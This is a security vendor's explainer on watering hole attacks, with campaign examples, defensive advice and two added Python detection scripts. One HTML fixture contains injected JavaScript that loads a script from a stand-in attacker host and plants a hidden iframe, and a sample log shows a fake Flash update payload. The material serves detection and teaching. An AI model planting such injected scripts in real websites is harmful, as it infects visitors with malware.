Tech Insight : What Is A ‘Watering Hole’ Attack?

Written by Pronetic

Pronetic is a leading provider of core IT support for ISO 27001, Cyber Essentials and Cyber Essentials Plus compliance.

January 26, 2022

In this tech insight, we look at what a watering hole attack is, some examples of such attacks, and how businesses can defend against this threat.

Poisoning The Water

A watering hole attack is a targeted cyber-attack strategy that, like spear phishing, is aimed at a specific organisation or sector. It is often described as a ‘supply chain’ attack because it abuses a trusted third-party resource rather than attacking the target’s own systems directly. The attacker first identifies a website that staff of the target organisation, or of an entire sector, visit regularly. Having studied the weaknesses in the target’s environment (typically unpatched browsers or browser plug-ins), the attacker compromises the ‘watering hole’ site so that it quietly delivers malware, such as a Remote Access Trojan (RAT), that exploits those weaknesses.
When a device belonging to a member of the target organisation becomes infected simply by visiting the site (like drinking from a poisoned watering hole, hence the name), with nothing for the user to notice (a ‘drive-by’ download), the attacker gains access to that device. This can, in turn, give the attacker a foothold on the target organisation’s network.

Stealing and Spying

The goals of this strategy, as with many others, are to steal personal information, banking details and intellectual property, and/or to conduct espionage. It can also give the attacker access to corporate systems and assets, and the information gathered from one compromised device is often used to stage further attacks.

Examples

Examples of watering hole attacks include:

– The VOHO multi-phase campaign. Back in 2012, attackers compromised a local government website in Maryland and the site of a regional bank in Massachusetts, along with other sites related to the promotion of democracy in oppressed regions. The intended targets were organisations in financial services, government agencies and the defence industry. Visitors to the compromised sites were silently redirected to an exploit site that installed Gh0st RAT malware. Around 32,000 visitors from 731 unique organisations worldwide were redirected to the exploit site, where around 4,000 hosts are believed to have downloaded exploit files: a success rate of roughly 12 percent for the attackers.

– From 2017 to 2018, a country-level watering-hole attack attributed to the Chinese-speaking “LuckyMouse” / “Iron Tiger” group targeted the national data centre of an unnamed Central Asian country. In this espionage campaign the attackers injected malicious JavaScript code into official government websites, turning them into delivery points for the attackers’ malware.

– The ‘Holy Water’ campaign, which began in 2019, targeted religious and charity groups in Asia. Compromised sites presented visitors with a fake Adobe Flash update prompt; accepting it triggered the malware download. Although the motive was unclear, the campaign is believed to have been espionage.

How To Protect Your Business From Watering Hole Attacks

Ways that you can protect your business from watering hole attacks include:

– Keep operating systems, browsers, browser plug-ins and anti-virus software fully patched and up to date; drive-by infections usually rely on unpatched browser or plug-in vulnerabilities.

– Use browser-based security tools that warn users about sites with a bad reputation and add extra malware protection in the browser.

– Have a good email protection solution and, more importantly for this threat, consider using a secure web gateway (SWG) to filter out suspect web traffic and inspect downloads.

– Identify the websites most visited by employees and regularly inspect and monitor them for signs of compromise, such as newly added scripts or unexpected redirects. Also, have a procedure in place to quickly tell employees not to visit a site that has been identified as compromised.

– Check traffic from third-party and external sites before allowing employee access.

– Assess, know, and control the full extent of your supply chain (a watering hole attack is a supply chain attack).

– Educate/inform and train employees about the nature of the threat and how to avoid it.

– Never click on unknown or suspect links in emails or websites, and exercise caution at all times when browsing; in particular, treat an unexpected ‘update’ or ‘plug-in’ prompt from a website as suspect.

– Consider adopting a ‘zero trust’ security approach for the business/organisation.
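The advice above to inspect and monitor the websites employees visit most is easiest to act on if you keep a baseline of what each page normally loads and compare a fresh copy against it. The script below is an added example written for this article, not code from the original post or from any vendor: it records every external script host and a hash of every inline script on a page, then reports anything new on the next check, which is exactly how the injected JavaScript in the LuckyMouse example would show up. The page URL, the two HTML snapshots and the ‘compromised’ script are all constructed for the example (the hosts use reserved example domains and a TEST-NET address).

```python
"""Baseline-and-diff monitor for the scripts a frequently visited website loads.

Added example, not code from the original article. Constructed HTML stands in
for the result of fetching the page; in practice the baseline would be stored
after a trusted crawl and the current copy fetched on a schedule.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src="..." on <script> tags
        self.inline = []        # text of <script> blocks that have no src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def fingerprint(page_url, html):
    """Return a record of the script hosts and inline-script hashes a page uses."""
    collector = ScriptCollector()
    collector.feed(html)
    site_host = urlparse(page_url).netloc.lower()
    hosts = set()
    for src in collector.external:
        # A relative src such as /static/app.js is served by the site itself.
        hosts.add(urlparse(src).netloc.lower() or site_host)
    inline = {hashlib.sha256(s.encode()).hexdigest() for s in collector.inline}
    return {"script_hosts": sorted(hosts), "inline_sha256": sorted(inline)}


def compare(baseline, current):
    """List script hosts and inline scripts present now but absent from the baseline."""
    findings = []
    for host in current["script_hosts"]:
        if host not in baseline["script_hosts"]:
            findings.append(f"new external script host: {host}")
    for digest in current["inline_sha256"]:
        if digest not in baseline["inline_sha256"]:
            findings.append(f"new or modified inline script (sha256 {digest[:12]}...)")
    return findings


PAGE_URL = "https://council.example.org/news"   # hypothetical frequented site

# Constructed: the page as it looked when the baseline was taken.
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://analytics.example.net/a.js"></script>
<script>window.cfg = {"lang": "en"};</script>
</head><body><h1>Council news</h1></body></html>"""

# Constructed: the same page after a watering hole compromise, with one extra
# script host and one injected inline script that adds a hidden frame.
COMPROMISED_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://analytics.example.net/a.js"></script>
<script>window.cfg = {"lang": "en"};</script>
<script src="https://203.0.113.5/flash-update/loader.js"></script>
<script>var f=document.createElement("iframe");f.src="https://203.0.113.5/x.html";f.style.display="none";document.body.appendChild(f);</script>
</head><body><h1>Council news</h1></body></html>"""


def run_example():
    baseline = fingerprint(PAGE_URL, BASELINE_HTML)    # kept from a trusted crawl
    current = fingerprint(PAGE_URL, COMPROMISED_HTML)  # fetched on the next check
    return compare(baseline, current)


if __name__ == "__main__":
    for finding in run_example():
        print("ALERT", PAGE_URL, finding)
```

A new script host is the strongest signal and is worth an immediate block at the web gateway while the site owner is contacted; a changed inline script also fires after legitimate site updates, so that finding is best routed for a quick manual look rather than an automatic block.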

What Does This Mean For Your Business?

This is broadly a supply-chain related attack (via trusted web resources) where, instead of actively hacking the target or sending phishing emails, the criminals set traps for unsuspecting victims to walk into. For that reason it is harder for businesses to spot. The first step is recognising and raising awareness of the threat. Following normal security good practice is always helpful, plus some additional measures in this case: identifying, regularly inspecting and monitoring the websites most visited by employees, and looking at what additional malware protection can be added to employees’ browsers and devices. With an increasing number of more complex and inventive attack methods, many businesses are shifting to a complete ‘Zero Trust’ approach for their IT security. A data-centred rather than ‘moat and castle’ view of IT security gives companies greater holistic control and reduces the potential for the kind of gaps that cyber criminals can exploit with strategies like watering hole attacks.
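The redirect chain described in the VOHO example, and the fake update lure in the Holy Water example, both leave a distinctive trace in web-proxy or secure web gateway logs: several staff browsers arriving at an unfamiliar host straight from a site they routinely visit, and fetching executable content there. The script below is an added example written for this article, not code from the original post or from any proxy vendor. It assumes a simplified, constructed tab-separated log format (time, client, method, URL, status, content type, referer); real products such as Squid or a commercial SWG lay the fields out differently but carry the same information. The frequented-site list, the third-party allow-list and the log lines are all constructed and use reserved example domains and a TEST-NET address.

```python
"""Detection over web-proxy logs for the drive-by redirect pattern of a
watering hole attack: staff browsers pulled from a routinely visited site to
an unfamiliar host that serves a payload or an 'update' lure.

Added example, not code from the original article. Log format, host lists
and sample lines are all constructed.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Hosts staff visit routinely, i.e. the candidate watering holes. Assumed here;
# in practice derive this from weeks of proxy history.
FREQUENTED_HOSTS = {"council.example.org", "bank.example.com"}

# Third-party hosts those sites legitimately load content from (assumed allow-list).
KNOWN_THIRD_PARTY = {"analytics.example.net", "cdn.example.net"}

EXECUTABLE_TYPES = {
    "application/x-msdownload", "application/x-msdos-program",
    "application/octet-stream", "application/java-archive",
    "application/x-shockwave-flash",
}
LURE_WORDS = ("flash", "update", "install", "plugin", "setup")


def parse_line(line):
    """Parse one constructed log line; return None for malformed lines."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 7:
        return None
    time, client, method, url, status, ctype, referer = fields
    return {
        "time": time, "client": client, "method": method, "url": url,
        "host": urlparse(url).netloc.lower(), "status": status,
        "ctype": ctype.split(";")[0].strip().lower(),
        "ref_host": urlparse(referer).netloc.lower() if referer != "-" else "",
    }


def is_suspicious(rec):
    """True if the request left a frequented site for an unfamiliar host and fetched a payload."""
    if rec["ref_host"] not in FREQUENTED_HOSTS:
        return False
    if rec["host"] in FREQUENTED_HOSTS or rec["host"] in KNOWN_THIRD_PARTY:
        return False
    path = urlparse(rec["url"]).path.lower()
    looks_like_payload = (rec["ctype"] in EXECUTABLE_TYPES
                          or any(word in path for word in LURE_WORDS))
    return looks_like_payload and rec["status"].startswith("2")


def analyse(lines, min_clients=2):
    """Group suspicious requests by (referring site, landing host); report those
    that caught at least min_clients distinct machines, which separates a
    campaign from one user downloading a vendor installer."""
    hits = defaultdict(lambda: {"clients": set(), "urls": set()})
    for line in lines:
        rec = parse_line(line)
        if rec and is_suspicious(rec):
            key = (rec["ref_host"], rec["host"])
            hits[key]["clients"].add(rec["client"])
            hits[key]["urls"].add(rec["url"])
    findings = []
    for (ref, host), h in sorted(hits.items()):
        if len(h["clients"]) >= min_clients:
            findings.append({"watering_hole": ref, "landing_host": host,
                             "clients": len(h["clients"]), "urls": sorted(h["urls"])})
    return findings


# Constructed sample log: two clients lured from the council site to 203.0.113.5,
# one client fetching a genuine vendor installer, and ordinary page loads.
SAMPLE_LOG = """\
2022-01-20T09:01:12\t10.0.0.21\tGET\thttps://council.example.org/news\t200\ttext/html\t-
2022-01-20T09:01:13\t10.0.0.21\tGET\thttps://analytics.example.net/a.js\t200\tapplication/javascript\thttps://council.example.org/news
2022-01-20T09:01:14\t10.0.0.21\tGET\thttps://203.0.113.5/flash-update/loader.js\t200\tapplication/javascript\thttps://council.example.org/news
2022-01-20T09:01:15\t10.0.0.21\tGET\thttps://203.0.113.5/flash-update/FlashPlayer.exe\t200\tapplication/x-msdownload\thttps://council.example.org/news
2022-01-20T09:04:40\t10.0.0.37\tGET\thttps://council.example.org/news\t200\ttext/html\t-
2022-01-20T09:04:42\t10.0.0.37\tGET\thttps://203.0.113.5/flash-update/FlashPlayer.exe\t200\tapplication/x-msdownload\thttps://council.example.org/news
2022-01-20T09:10:05\t10.0.0.52\tGET\thttps://bank.example.com/login\t200\ttext/html\t-
2022-01-20T09:10:06\t10.0.0.52\tGET\thttps://cdn.example.net/style.css\t200\ttext/css\thttps://bank.example.com/login
2022-01-20T09:12:00\t10.0.0.60\tGET\thttps://vendor.example.com/setup.exe\t200\tapplication/x-msdownload\thttps://council.example.org/downloads
"""


def run_example():
    return analyse(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for finding in run_example():
        print("ALERT", finding)
```

Run against the sample, the single finding names council.example.org as the watering hole and 203.0.113.5 as the landing host, with two clients; the lone vendor download from a third client stays below the threshold. The clients that appear in a finding are the machines to isolate and examine first, and the landing host is the one to block at the gateway.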
